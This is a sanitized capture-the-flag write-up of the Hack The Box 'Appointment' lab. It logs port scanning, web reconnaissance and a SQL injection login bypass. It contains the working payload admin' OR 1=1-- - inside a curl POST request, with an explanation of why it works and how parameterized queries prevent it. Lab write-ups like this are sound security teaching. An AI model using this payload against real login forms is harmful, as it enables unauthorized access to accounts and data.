
Walkthrough: Appointment (HTB Starting Point)


Difficulty: Easy | Published: 2026-06-12 | Sanitized local writeup


Source coverage

Moderate source coverage (65%). Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

Evidence verdict: moderate confidence. The page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

Sources:
  • <TARGET>-Appointment/walkthrough.md
  • HTB/<TARGET>-Appointment/notes.md

Technical Walkthrough


Target: <TARGET> | OS: Linux | Difficulty: Easy | Date: 2026-05-05

Step 1: Port Scan

bash
nmap -sC -sV -oN ./<TARGET>/nmap/initial <TARGET>

Result: Port 80 open (Apache 2.4.38, page title "Login"). Port 8254 filtered (irrelevant). Full port scan confirmed no additional services.

Step 2: Web Reconnaissance

bash
curl -s -i http://<TARGET>/

Result: Simple login form with username and password POST fields. Bootstrap-based template. No additional endpoints found (robots.txt, .git, sitemap.xml all returned 404).

Step 3: Default Credentials (Failed)

bash
curl -s -i -X POST http://<TARGET>/ -d 'username=admin&password=<redacted>'

Result: Login page returned unchanged (4896 bytes). Default creds do not work.

Step 4: SQL Injection Auth Bypass (Success)

bash
curl -s -i -X POST 'http://<TARGET>/' \
  -d 'username=admin%27+OR+1%3D1--+-&password=<redacted>'

Payload decoded: admin' OR 1=1-- -

How it works: the backend presumably builds its query by string concatenation, along the lines of (the placeholder names are inferred, only the pattern is known):

sql
SELECT * FROM users WHERE username='$user' AND password='$pass'

With the injected username the query string becomes:

sql
SELECT * FROM users WHERE username='admin' OR 1=1-- -' AND password='$pass'

OR 1=1 makes the WHERE clause true for every row, and -- - opens a comment that swallows the dangling quote and the whole password check. The query returns every row of the users table, and because the application only checks that some row came back, it treats the request as a successful login. The password value sent with the payload is therefore irrelevant.

Result: Response changed to 2440 bytes containing the flag:

text
Congratulations!
Your flag is: <hash redacted>

Flag

text
<hash redacted>

Lessons Learned

  1. Box name as hint: "Appointment" + Easy difficulty + login form = high probability of SQL injection. HTB Starting Point boxes often have their vulnerability class hinted in the name.
  2. Speed over thoroughness for Easy: Default cred check + SQLi bypass took under 5 minutes. No directory fuzzing or heavy enumeration was needed.
  3. Classic SQLi pattern: The ' OR 1=1-- - bypass remains the first thing to try on any login form that builds SQL from raw input. MySQL only treats -- as a comment when it is followed by whitespace; the trailing - gives that space something to precede so it is not trimmed away, and the remainder of the query is ignored.
  4. No parameterized queries: The application directly concatenates user input into SQL. This is the textbook vulnerability that prepared statements / parameterized queries prevent.

Tools Used

  • nmap (port scanning, service detection)
  • curl (HTTP requests, form submission)

Files

File | Description
nmap/initial | Initial nmap scan output
nmap/allports | Full TCP port scan output
enum/sqli-bypass-response.txt | Full HTTP response from successful SQLi
enum/default-creds-response.txt | Full HTTP response from failed default creds
loot/flag.txt | Captured flag

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target IP: <TARGET>
  • Target Name: Appointment
  • Target OS: Linux
  • Difficulty: Easy (Starting Point)
  • Pwnbox SSH: x08@<TARGET>
  • Attacker VPN IP: <TARGET>
  • Start Time: 2026-05-05
  • Timebox: 45-60 min solve target
  • Actual Solve Time: ~5 minutes

Hypothesis

Name "Appointment" suggests a booking/scheduling web app. Expect HTTP service with login form vulnerable to SQL injection (classic admin' OR 1=1-- bypass) or default credentials.

Result: Hypothesis confirmed. Login form on port 80, SQLi auth bypass worked first try.

Findings

Open Services

Port | Service | Version
80/tcp | HTTP | Apache 2.4.38 (Debian)
8254/tcp | filtered | unknown

Web Application

  • Simple login form at / (POST method, fields: username, password)
  • Title: "Login"
  • No additional pages discovered (no robots.txt, .git, sitemap.xml)
  • Template: Bootstrap-based login template with daterangepicker (scheduling/appointment theme)

Vulnerability

  • SQL Injection on login form -- username field is injectable
  • Payload: admin' OR 1=1-- - with any password
  • The backend likely runs: SELECT * FROM users WHERE username='INPUT' AND password='INPUT'
  • The injected query becomes: SELECT * FROM users WHERE username='admin' OR 1=1-- -' AND password='INPUT'
  • The WHERE clause is true for every row and the password check is commented out, so the query returns rows and authentication is bypassed

Flag

  • Flag: <hash redacted>
  • Captured from live target via SQLi auth bypass

Command Log

Phase 0: Setup

  • Workspace created at <local workspace><TARGET>/
  • Memory files loaded: MEMORY.md, htb_web_attack_patterns.md, htb_quick_wins.md
  • Pwnbox SSH verified, VPN IP <TARGET> confirmed, target reachable (303ms)

Phase 1: Recon

  • nmap -sC -sV -- port 80 open (Apache 2.4.38, title "Login"), 8254 filtered
  • nmap -p<redacted> --min-rate 5000 -- confirmed only port 80 open
  • curl -s -i http://<TARGET>/ -- retrieved login form HTML
  • Quick win checks (robots.txt, .git, sitemap.xml) -- all 404

Phase 3: Synthesis

  • Single HTTP service with login form
  • No other attack surface
  • Primary path: SQLi on login form (high confidence based on box name + difficulty)
  • Backup path: directory fuzzing, default creds, brute force

Phase 4: Foothold

  • Default creds admin:admin -- failed (returned login page, 4896 bytes)
  • SQLi bypass admin' OR 1=1-- - -- SUCCESS (returned flag page, 2440 bytes)
  • Flag captured: <hash redacted>

Phase 5: Privesc

  • N/A -- Starting Point box, single flag only